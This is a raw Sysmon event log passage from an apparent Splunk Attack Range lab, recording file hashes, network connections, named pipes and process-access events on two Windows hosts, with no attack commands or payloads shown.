23542300x8000000000000000807510Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:04.448{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D45D0F19CB6FDEE17E53D041EFAD1225,SHA256=ACD82E09DAA351BC9CD871ED6F5554829A1F5992DBA6252EB1320EE141FEB32A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048855Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:04.045{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96F36BA88F36012B01B856C290EAEB48,SHA256=07B7916B363860E97319B85E0B66D2B7673AD62E9487A96A1F9AF1C4C4DD9B7A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807514Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:05.760{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=68D0C7FC4FD54187DF19867D72E4513D,SHA256=EC9AC3541D8BAE625A20C0283C0754D36A9D9EA49D1A3C0F854E9D90269A9F6E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807513Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:05.760{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FB21AA7180C8B43A23A992F47DB272BD,SHA256=71DBCCA8263575F075B94D1D36D5A01E31DDBC4F02143A9FD7801B9A77B86170,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807512Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:52:05.463{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=789EECC8A8F6DE0F30C2FFB834158417,SHA256=B3DD2D13604E5A8B120758D4D137B2721232BB4921F9ED99E6EE0E19F0B80FA6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048856Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:05.062{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B5A7B4DF3D39364D271E1D2C3CEE3B1,SHA256=018F48E1810EF28F2E11EFA0104F56C22E041EEFAC8A000F4DC63ADC3BF8DBDF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807511Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:04.189{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57261-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807517Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:06.463{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DBC38B7FBC9DAF3ED7E912ACC9AADC8,SHA256=F735D8255CB3E73A1CC883480FF8F4F67521937213BD22264AA4C5527C8D8AD0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048864Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:52:06.247{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048863Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:06.193{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-53D9-60E8-E60F-00000000CF01}3924C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001048862Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:52:06.193{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-53D9-60E8-E60F-00000000CF01}3924C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001048861Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 07:52:06.193{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.3924.431.153330220C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001048860Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 07:52:06.193{466BC892-53D9-60E8-E60F-00000000CF01}3924\chrome.3924.431.153330220C:\Program Files\Mozilla Firefox\firefox.exe 354300x80000000000000001048859Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:58.312{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57262-false10.0.1.14win-dc-890.attackrange.local49676- 354300x80000000000000001048858Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:57.723{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51020-false10.0.1.12-8000- 23542300x80000000000000001048857Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:06.078{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10135BE9AFB9115BEFF0C3887DB7702C,SHA256=4EA6A61815090C2179E83F1AD9312C9C97A060768E13117476E740F56AA9EBD9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807516Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:04.917{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57262-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 354300x8000000000000000807515Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:04.620{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-41968-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000807518Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:07.510{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1EBD8D8EEB04EB3B1D2782F3B234EFBA,SHA256=1E3805D38249A3F8600EFBC7A1542458307ED57D148F99F0D676DC8D8A65B7ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048865Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:07.078{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C2C762FD80B7CF0E7273D7FAE7D6D14,SHA256=FD5C3BD56BF6C8E2F814B57B587697E9EA3B0F40FAE226636A2E51557BEF536C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807519Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:08.510{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A11A18180A912C91FDEE8F15607C0BC,SHA256=D3B0E76DC85365715CB36BE7EF02123C4E16BEF0873B495E5F101BD43A6E4A94,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048866Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:08.111{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCA387B4E878887B9E13B61C4D2A9D8F,SHA256=26786B619E9043680D743CD71D69DB325200E9B4C071723FCBD33D19A74B0576,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807520Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:09.526{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34AE2EB54558492FA3233643D449F9EE,SHA256=B12C2B211BE3558C00A398717A265C52CF438C090BDFA78E50C7F165EA34EC38,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048875Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:09.984{466BC892-32D3-60E8-770B-00000000CF01}63565620C:\Windows\Explorer.EXE{466BC892-F49A-60EB-317D-00000000CF01}9572C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\ole32.dll+8a360|C:\Windows\System32\ole32.dll+8c46e|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8c3d|C:\Windows\System32\SHELL32.dll+28385e|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced|C:\Windows\system32\explorerframe.dll+1ac26|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64
_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+5888a 10341000x80000000000000001048874Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:09.984{466BC892-32D3-60E8-770B-00000000CF01}63565620C:\Windows\Explorer.EXE{466BC892-F49A-60EB-317D-00000000CF01}9572C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8c3d|C:\Windows\System32\SHELL32.dll+28385e|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x80000000000000001048873Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:52:09.632{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F4A9-60EB-337D-00000000CF01}8756C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048872Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:09.632{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F4A9-60EB-337D-00000000CF01}8756C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048871Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:52:09.616{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F4A9-60EB-337D-00000000CF01}8756C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048870Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:09.616{466BC892-32CD-60E8-670B-00000000CF01}45164260C:\Windows\system32\csrss.exe{466BC892-F4A9-60EB-337D-00000000CF01}8756C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048869Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:09.616{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F4A9-60EB-337D-00000000CF01}8756C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048868Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:52:09.616{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F4A9-60EB-337D-00000000CF01}8756C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+36349|c:\windows\system32\rpcss.dll+3bb32|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001048867Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:09.115{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED5B443631E50E71972313AB189CB67E,SHA256=43372EC646A8D7C2280294D55D16B7461C448E984BB0CF2C2D7683118C99C796,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807522Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:10.541{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44076A82EC2B2A7683E2C6E0CE040979,SHA256=E3089C869D5A1AD4608C00791B394599CDB6DF99983F860C3D307D49AA8EA472,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x80000000000000001048881Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:10.631{466BC892-32D3-60E8-770B-00000000CF01}63565956C:\Windows\Explorer.EXE{466BC892-F49A-60EB-317D-00000000CF01}9572C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001048880Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:10.600{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=09BA4ED778BC7F512BD93175B4B8D69F,SHA256=2EC75809DF32B07AFC0102CB881CBF325E3128ED9F0CD2F4ABE0B533D6DAFCFF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048879Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:10.600{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5908B71AD457D4F41DA91769D0ECAB10,SHA256=A1DC0C1BE426B632ADA234FBF36D4ED891A9E38229F8A8FD1819BC7AD443CAD9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048878Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:52:10.453{466BC892-32D3-60E8-770B-00000000CF01}63565620C:\Windows\Explorer.EXE{466BC892-F49A-60EB-317D-00000000CF01}9572C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\ole32.dll+8a26e|C:\Windows\System32\ole32.dll+89b6b|C:\Windows\System32\ole32.dll+88d27|C:\Windows\System32\ole32.dll+8c957|C:\Windows\System32\SHELL32.dll+2c8c3d|C:\Windows\System32\SHELL32.dll+28385e|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced|C:\Windows\system32\explorerframe.dll+1ac26|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9 10341000x80000000000000001048877Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:52:10.453{466BC892-32D3-60E8-770B-00000000CF01}63565620C:\Windows\Explorer.EXE{466BC892-F49A-60EB-317D-00000000CF01}9572C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\ole32.dll+b5f62|C:\Windows\System32\ole32.dll+89b39|C:\Windows\System32\ole32.dll+88d27|C:\Windows\System32\ole32.dll+8c957|C:\Windows\System32\SHELL32.dll+2c8c3d|C:\Windows\System32\SHELL32.dll+28385e|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.commo